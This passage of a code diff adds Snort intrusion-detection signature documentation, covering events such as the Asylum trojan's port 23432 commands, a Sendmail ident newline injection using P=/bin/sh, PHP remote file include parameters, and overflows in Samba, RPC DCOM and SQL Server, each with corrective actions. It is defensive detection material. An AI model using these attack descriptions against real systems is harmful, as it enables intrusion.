+http://www.ietf.org/rfc/rfc2407.txt
+http://www.ietf.org/rfc/rfc2408.txt
+
+IANA:
+http://www.iana.org/assignments/isakmp-registry
+
+--
--- /dev/null
+++ b/doc/signatures/3014.txt
@@ -0,0 +1,81 @@
+Rule: 
+
+--
+Sid: 
+3014
+
+-- 
+Summary: 
+This event is generated when a victim host attempts to send a connection
+confirmation to an attacker using the Asylum 0.1 trojan.
+
+-- 
+Impact: 
+If successful, the attacker would gain unauthorized access to your system, enabling him to upload and execute files on your
+computer and reboot it at will, resulting in a full compromise of the victim's computer. 
+
+--
+Detailed Information:
+When executed, Asylum 0.1 opens up its assigned port (default is 23432) for communication with the attacker.
+Asylum 0.1 has four functions: Upload File, Open File, Reboot Computer, and Remove Server. 
+
+Upload File: Look for traffic on port 23432 containing UPL followed by a file location.
+Open File: Look for traffic on port 23432 containing RUN followed by a file location.
+Reboot: Look for the string "RBT" on port 23432.
+Remove Server: Look for the string "DIE" on port 23432.
+
+--
+Affected Systems:
+Windows 95/98/ME/NT/2000
+
+--
+
+Attack Scenarios: 
+The victim must first install the server. Be wary of suspicious files because they often can be backdoors in disguise.
+Once the victim mistakenly installs the server program, the attacker usually will employ an IP scanner program
+to find the IP addresses of victims that have installed the program. Then the attacker enters the IP address, port number (which 
+is assigned to the server program by the attacker: default is 23432), and presses the connect button and he has access to your computer.
+
+-- 
+
+Ease of Attack: 
+Easy. Simply a matter of pressing the connect button once the victim has installed the server.
+
+
+-- 
+
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+-- 
+
+Corrective Action:
+Delete the System Administration key (if found) in 
+HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run or
+HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices or
+HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run.
+
+Open the system.ini and (if found) replace shell=Explore.exe win32cmp.exe to shell=explore.exe
+
+Open the win.ini and (if found) delete load=c:\windows\wincmp32.exe or run=c:\windows\wincmp32.exe
+
+Find and delete the Asylum 0.1 trojan server file, usually called wincmp32.exe.
+
+Keep your anti-virus programs updated with the latest definitions.
+
+--
+Contributors:
+Original Rule Writer: Ricky Macatee <rmacatee@sourcefire.com> 
+Sourcefire Research Team
+
+-- 
+Additional References:
+http://www.pestpatrol.com/PestInfo/A/Asylum.asp
+http://www.dark-e.com/archive/trojans/asylum/01/index.shtml
+
+
+--
--- /dev/null
+++ b/doc/signatures/1029.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1029
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential 
+weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential 
+weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation
+on the host, this may be the prelude to an attack against that host 
+using that information.
+
+This rule generates an event when an attempt is made to browse the scripts directory on a web server. This driectory may contain source code files for web application scripts running on the server. An attacker may be able to view the source code and use the information in further attacks against the server.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the 
+IIS implementation. The attacker might then gain administrator access to
+the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been 
+taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3023.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3023
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1180.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1180
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2505.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2505
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/474.txt
@@ -0,0 +1,65 @@
+Rule:
+--
+Sid:
+474
+
+--
+Summary:
+This event is generated when an ICMP Echo Request from the Windows based
+scanner SuperScan is detected.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+SuperScan is a freely available Windows based scanner from Foundstone. 
+The scanners default behavior is to send an ICMP Echo Request before 
+starting the scan. This ICMP packet has a special payload of eight (8) bytes, 
+consisting of the number zero (0).
+
+This scanner is fairly popular among Windows users.
+
+--
+Affected Systems:
+	All
+ 
+--
+Attack Scenarios:
+SuperScan may be used as an information gathering tool to detect active hosts
+on a network by sending icmp echo requests. 
+
+--
+Ease of Attack:
+Simple.  SuperScan is widely available.
+
+--
+False Positives:
+Tools other than SuperScan may generate echo requests with the same content.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Johan Augustsson
+<johan.augustsson@adm.gu.se> and Josh Gray
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Foundstone
+http://www.foundstone.com/
+
+McAfee:
+http://vil.nai.com/vil/content/v_103727.htm
+
+--
--- /dev/null
+++ b/doc/signatures/3422.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3422
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000720.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000720
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPRaid" application running on a webserver. Access to the file "locations.php" using a remote file being passed as the "phpraid_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpraid_dir" parameter in the "locations.php" script used by the "PHPRaid" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPRaid
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1226.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+1226
+
+--
+Summary:
+This event is generated when an attempt to launch an X windows application on an X windows server is made.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+Implementations of the X windows system from the X consortium may use weak authentication methods when allowing remote machines to connect to a host running X windows.
+
+XDM is used to allow remote users access to the remote X window server. When configured incorrectly, this may allow an unathorised user to connect to the display.
+
+This event is generated when a user outside the protected network opens an X windows application on the remote X server.
+
+--
+Attack Scenarios:
+The remote attacker may scan the host for listening X window servers, then connect to the remote host using XDM. The attacker may then execute an X windows application on the remote host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow connections to X servers from hosts outside the protected network.
+
+Apply the appropriate vendor patches.
+
+Upgrade to the latest version of the software.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS396
+
+--
--- /dev/null
+++ b/doc/signatures/667.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+667
+
+--
+Summary:
+This event is generated when an external attacker attempts to exploit a vulnerability in Sendmail where newline characters in ident messages are not properly parsed.
+
+--
+Impact:
+Severe. Remote execution of arbitrary code, leading to remote root compromise. 
+
+--
+Detailed Information:
+Sendmail 8.6.10 and earlier versions contain a vulnerability related to the parsing of newline characters (\n) in commands passed from ident to Sendmail. An attacker can use a specially crafted command with newlines in an ident response to Sendmail. The message is not properly parsed and Sendmail forwards the response, with included commands, to its queue. The commands are then executed while the message awaits delivery in the Sendmail queue, causing the included arbitrary code to be executed on the server in the security context of Sendmail. 
+
+--
+Affected Systems:
+Systems running unpatched versions of Sendmail 8.6.10 or earlier.
+
+--
+Attack Scenarios:
+An attacker sends an email with newline characters and includes a path variable of P=/bin/sh. Directives included in the transmission are executed while the message remains in the Sendmail queue.
+
+--
+Ease of Attack:
+Moderate. Multiple exploits exist, but the window of opportunity is small; the vulnerability must be exploited while the message is queued for delivery and must have sufficient time (the mail server must be busy/slow) to execute the commands.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest version of Sendmail.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0204
+
+Bugtraq
+http://www.securityfocus.com/bid/2311
+
+--
--- /dev/null
+++ b/doc/signatures/2853.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2853
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure generate_replication_trigger
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2472.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2472
+
+--
+Summary:
+This event is generated when an attempt is made to access the C$ default
+administrative share of a Windows host.
+
+--
+Impact:
+Serious. Possible administrator access to the host. Information 
+disclosure.
+
+--
+Detailed Information:
+By default, Windows hosts have default administrative shares of the 
+local hard drives using the format %DRIVE_LETTER% + $. Anybody with 
+administrative rights can remotely access the share.
+
+--
+Affected Systems:
+	Windows hosts.
+
+--
+Attack Scenarios:
+An attacker may be attempting to access files located on the C drive of 
+the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Netbios access from external networks (tcp port 139).
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS339
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;100517
+
+--
--- /dev/null
+++ b/doc/signatures/3118.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3118
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1739.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1739
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/706.txt
@@ -0,0 +1,79 @@
+Rule:
+
+--
+Sid:
+
+706
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a 
+vulnerability in Microsoft SQL Server and Data Engine.
+
+--
+Impact:
+Serious. Full system compromise is possible.
+
+--
+Detailed Information:
+A buffer overflow condition in the xp_peekqueue variable exists which 
+may allow the execution of an arbitary command with administrative 
+priviledge.
+
+The vulnerability occurs in API Srv_paraminfo(), which is implemented by
+Extended Stored Procedures (XPs) in Microsoft SQL Server and Data 
+Engine. It may also be possible for attackers to execute arbitrary code 
+on the host running SQL Server. 
+
+
+--
+Affected Systems:
+
+ Microsoft SQL Server 7.0
+ Microsoft SQL Server 2000 
+ Microsoft Data Engine 1.0
+ Microsoft Data Engine 2000 
+  
+
+--
+Attack Scenarios:
+
+An attacker can pass an overly long string to the XP xp_peekqueue,
+a buffer overflow can occur due to an unsafe memory copy. This can cause
+SQL Server to crash.
+
+
+--
+Ease of Attack:
+
+Simple. Exploit scripts are available.
+
+--
+False Positives:
+
+None known
+
+--
+False Negatives:
+
+None known
+
+--
+Corrective Action:
+ 
+Apply the appropriate vendor supplied patch
+(Microsoft Patch Q280380 , Microsoft Patch Q280380)
+
+--
+Contributors:
+Original Rule Writer Unknown
+Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2040/
+--
--- /dev/null
+++ b/doc/signatures/463.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+463
+
+--
+
+Summary:
+This event is generated when an ICMP Type 7 datagram with an undefined ICMP Code is detected on the network. 
+
+--
+
+Impact:
+ICMP Type 7 datagrams are not currently used by any known devices.
+
+--
+
+Detailed Information:
+ICMP Type 7 is not defined for use and is not expected network activity.  Any ICMP datagram with an undefined ICMP Code should be investigated.  
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Ingress filtering should be utilized to block incoming ICMP Type 7 datagrams
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/3036.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3036
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2988.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+2988
+
+--
+Summary:
+This event is generated when an attempt is made to bind to the Windows
+registry service via SMB. 
+
+--
+Impact:
+Serious. Remote administration of the Windows reqistry may be possible.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to bind to the Windows
+registry service via SMB across the network.
+
+It may be possible for an attacker to manipulate the Windows registry
+from a remote location. This could give the attacker administrative
+privileges on the target host as well as the opportunity to execute code
+of their choosing.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+If the Windows registry is accessible via SMB the attacker can
+manipulate the operating system registry settings.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000601.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000601
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "inv_markunpaid.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"inv_markunpaid.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000717.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000717
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPRaid" application running on a webserver. Access to the file "configuration.php" using a remote file being passed as the "phpraid_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpraid_dir" parameter in the "configuration.php" script used by the "PHPRaid" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPRaid
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2066.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2066
+
+--
+Summary:
+file on a Lotus Domino Server.
+
+--
+Impact:
+Information disclosure
+
+--
+Detailed Information:
+Certain versions of Lotus Domino web servers do not correctly handle 
+requests for script files not specific to Lotus Domino.
+
+By using a dot in the filename an attacker may view the source of the 
+script and be presented with sensitive information embedded in the 
+script.
+
+--
+Affected Systems:
+Lotus Domino Server 5.0 and 6.0
+
+--
+Attack Scenarios:
+The attacker merely needs to make an HTTP request for the script and add
+a dot to the filename. This can be done using a browser.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor fixes
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
